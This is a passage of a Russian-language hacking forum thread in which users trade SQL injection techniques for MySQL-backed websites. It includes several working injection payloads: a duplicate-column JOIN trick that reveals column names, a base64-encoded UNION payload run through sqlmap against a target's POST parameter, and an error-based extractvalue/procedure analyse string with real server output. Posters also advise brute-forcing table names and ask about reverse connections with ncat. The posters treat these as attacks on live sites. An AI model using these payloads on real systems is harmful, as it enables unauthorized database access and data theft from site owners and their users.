Старый 02.06.2016, 10:26   #3551
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
Я вот не понимаю: судя по ответу - обычный sql запрос без всяких подзапросов и прочих извратов.
...
Т.е. таки подзапросы?
Скорее всего сначала select count(*), а потом уже сам запрос.
Иногда можно раскрутить, если можешь дополнительный селект делать на case random
__________________
Jokester: Ок, с тобой проще согласиться чем переубедить. :)
HeartLESS вне форума   Ответить с цитированием
Старый 06.07.2016, 07:04   #3552
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Есть фильтр на наличие в запросе information_schema. Угадать названия таблиц не получается (префикс или еще какие-то фильтры?). Без использования information_schema узнать названия таблиц/колонок реально?
__________________
Roamer, wanderer
Nomad, vagabond
Call me what you will

(c) Metallica
nomad вне форума   Ответить с цитированием
Старый 06.07.2016, 11:56   #3553
Molofya
 
Регистрация: 09.07.2015
Сообщений: 21
Репутация: -1
По умолчанию

Цитата:
Сообщение от nomad Посмотреть сообщение
Есть фильтр на наличие в запросе information_schema. Угадать названия таблиц не получается (префикс или еще какие-то фильтры?). Без использования information_schema узнать названия таблиц/колонок реально?
Только брут.
Molofya вне форума   Ответить с цитированием
Старый 06.07.2016, 17:10   #3554
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Если есть вывод ошибок, колонки узнать можно:

Цитата:
MySQL 5 (актуально когда нет доступа к information_schema)
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b)a
==>
#1060 - Duplicate column name 'id'
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id))a
==>
#1060 - Duplicate column name 'name'
-1 UNION SELECT * FROM (SELECT * FROM users JOIN users b USING(id,name))a
Данные можно выводить без имён колонок, более подробно:

https://rdot.org/forum/showthread.php?t=60

Советую изучить всё, очень крутой хелп.
crlf вне форума   Ответить с цитированием
Старый 10.07.2016, 02:40   #3555
espi0
 
Регистрация: 10.07.2016
Сообщений: 1
Репутация: 0
По умолчанию

Здравствуйте. Прошу подсказать, кто сталкивался.
Есть скуля в ПОСТ-параметре.
Специфика целевого приложения такова, что запрос надо передавать в base64, к примеру:
вот оригинал: ' AND 1=2 UNION ALL SELECT 1,name,3 FROM users LIMIT 1 --
вот запрос: param1=JyBBTkQgMT0yIFVOSU9OIEFMTCBTRUxFQ1QgMSxuYW1 lLDMgRlJPTSB1c2VycyBMSU1JVCAxIC0t&v=bla
С этим проблем нет, tamper в sqlmap помогает имплементировать енкодинг.
Респонс же (в результате успешной "эксплуатации") приходит как значение одного из параметров HTTP-заголовка "Set-Cookie:", например:
Set-Cookie: param2=JDEwMy4yMDguODYuMTAwOyM%3D // -> $103.208.86.100;# (если сделать b64 декод)

Два момента:
1) sqlmap "не видит" уязвимости в параметре param1 (хотя она есть, т.к. ручками всё работает)
2) нету ли модуля или фичи в sqlmap, реализующей base64-декод нужных мне данных (передаваемых как значение одного из параметров заголовка "Set-Cookie:").

Если в sqlmap это ещё не реализовано - ок, это также будет полезным для меня ответом (т.к. в принципе я скриптом всё делать могу).

Спасибо!
espi0 вне форума   Ответить с цитированием
Старый 14.07.2016, 11:49   #3556
HeartLESS
 
Регистрация: 25.04.2012
Сообщений: 101
Репутация: 31
По умолчанию

вообще sqlmap поддерживает пользовательские tamper скрипты.
не знаю только, будет ли там возможность ответ парсить.

если sqlmap не находит уязвимости, попробуй руками префиксы/суффиксы задавать.

Можешь просто burp воткнуть проксей между sqlmap и сервером, и в ответе header преобразовывать, раз уж ты такой ленивый
__________________
Jokester: Ок, с тобой проще согласиться чем переубедить. :)

Последний раз редактировалось HeartLESS; 14.07.2016 в 11:55..
HeartLESS вне форума   Ответить с цитированием
Старый 25.07.2016, 13:36   #3557
Gorev
 
Аватар для Gorev
 
Регистрация: 05.07.2010
Сообщений: 70
Репутация: 11
По умолчанию

Доброе время суток всем.
При запросе select+login+from+admin+--
Перебрасывает на страницу логина админки, в любом месте где использую в название таблицы слово-админ ,перебрасывает, с другими таблицами все норм
__________________
Командантe гастарбайтер
Gorev вне форума   Ответить с цитированием
Старый 27.07.2016, 20:46   #3558
slv
 
Регистрация: 09.01.2015
Сообщений: 3
Репутация: 0
По умолчанию

Имеется SQL-inj в операторе LIMIT после ORDER BY. Таким образом, техника с использованием UNION SELECT неприменима. Применил ERROR-BASED метод описанный тут https://rdot.org/forum/showpost.php?p=36186&postcount=30:

Код:
http://url/index.php?p=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,version())),1)+--+


XPATH syntax error: ':5.5.47-0ubuntu0.14.04.1'
Встроенные функции version(), user(), database() выполняются и результат попадает в вывод ошибки, но любые попытки выполнить SELECT вместо них приводят только к ошибке синтаксиса:

Код:
http://url/index.php?p=1%20procedure%20analyse(extractvalue(rand(),concat(0x3a,(SELECT_STATEMENT))),1)+--+


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'SELECT_STATEMENT))),1) -- ,2' at line 1

Как извлечь данные из БД данным методом?
slv вне форума   Ответить с цитированием
Старый 06.08.2016, 11:53   #3559
UziUser
 
Регистрация: 25.12.2015
Сообщений: 26
Репутация: 0
По умолчанию

Имеется phpinfo()
Цитата:
5.6.17-0+deb8u1
какие трюки возможны?
UziUser вне форума   Ответить с цитированием
Старый 08.08.2016, 03:16   #3560
mikhailtpm
 
Аватар для mikhailtpm
 
Регистрация: 01.07.2015
Сообщений: 67
Репутация: 0
По умолчанию

Привет. Подскажите, как называется такая атака: на своей машине начинаешь слушать например ncat-ом порт, на жертве манипулируешь с параметрами и происходит подключение жертвы на твою машину?
mikhailtpm вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot